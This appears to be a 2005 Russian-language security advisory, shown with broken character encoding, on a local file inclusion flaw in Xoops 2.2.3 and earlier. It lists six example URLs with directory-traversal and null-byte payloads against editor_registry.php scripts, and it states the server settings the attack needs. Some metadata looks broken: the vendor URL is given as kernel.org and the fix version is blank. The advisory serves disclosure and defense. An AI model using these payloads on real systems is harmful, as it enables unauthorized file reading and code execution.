»нклюдинг локальных файлов в Xoops

ƒата публикации:
16.11.2005
ƒата изменени€:
16.11.2005
¬сего просмотров:
2063
ќпасность:
¬ысока€
Ќаличие исправлени€:
 оличество у€звимостей:
1
CVSSv2 рейтинг:
CVE ID:
Ќет данных
¬ектор эксплуатации:
¬оздействие:
CWE ID:
Ќет данных
Ќаличие эксплоита:
Ќет данных
”€звимые продукты:
”€звимые версии: Xoops 2.2.3 и более ранние версии

ќписание:
”€звимость позвол€ет удаленному пользователю просмотреть или выполнить произвольные локальные файлы на системе.

”€звимость существует из-за недостаточной обработки входных данных в параметре "xoopsConfig[language]" в сценарии "class/xoopseditor/textarea/editor_registry.php". ”даленный пользователь может с помощью специально сформированного URL выполнить произвольный локальный файл на системе. ѕример:

http://[target]/[path_to_xoops]/class/xoopseditor/textarea/
editor_registry.php?xoopsConfig[language]=../../../../../../../../../../script

http://[target]/[path_to_xoops]/class/xoopseditor/textarea/
editor_registry.php?xoopsConfig[language]=../../../../../../../../../../boot.ini%00

http://[target]/[path_to_xoops]/class/xoopseditor/koivi/
editor_registry.php?xoopsConfig[language]=../../../../../../../../../../script

http://[target]/[path_to_xoops]/class/xoopseditor/koivi/
editor_registry.php?xoopsConfig[language]=../../../../../../../../../../boot.ini%00

http://[target]/[path_to_xoops]/class/xoopseditor/dhtmltextarea/
editor_registry.php?xoopsConfig[language]=../../../../../../../../../../script

http://[target]/[path_to_xoops]/class/xoopseditor/dhtmltextarea/
editor_registry.php?xoopsConfig[language]=../../../../../../../../../../boot.ini%00

ƒл€ успешной эксплуатации у€звимости, опци€ "magic_quotes_gpc" должна быть выключена, а опци€ Уregister_globalsФ - включена.

URL производител€: kernel.org

–ешение: ”становите последнюю версию () с сайта производител€.

»сточник:

—сылки: Vulnerabilities in Xoops

или введите им€

CAPTCHA